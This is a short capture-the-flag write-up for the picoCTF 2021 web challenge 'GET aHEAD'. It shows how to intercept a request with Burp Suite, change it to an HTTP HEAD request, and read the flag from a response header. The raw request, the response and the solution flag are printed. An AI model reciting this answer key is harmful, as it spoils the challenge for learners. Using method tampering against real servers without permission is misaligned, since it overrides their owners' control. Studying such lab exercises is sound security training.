PicoCTF-2021 Writeup
Search
K

GET aHEAD

Problem

Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:47967/

Solution

  1. 1.
    Use Burp Suite to intercept the request of clicking the "Choose Blue" button.
  2. 2.
    Change the POST request to a HEAD request:
    HEAD /index.php HTTP/1.1
    Host: mercury.picoctf.net:47967
    Content-Length: 0
    Origin: http://mercury.picoctf.net:47967
    Connection: close
  3. 3.
    The returned HTML from the HEAD request in the browser will be empty, but in the HTTP history tab of Proxy in Burp Suite you can find the flag as a HTTP header in the response:
    HTTP/1.1 200 OK
    flag: picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}
    Content-type: text/html; charset=UTF-8

Flag

picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}
Web Exploitation - Previous
Bithug
Next - Web Exploitation
It is my Birthday
Last modified 1yr ago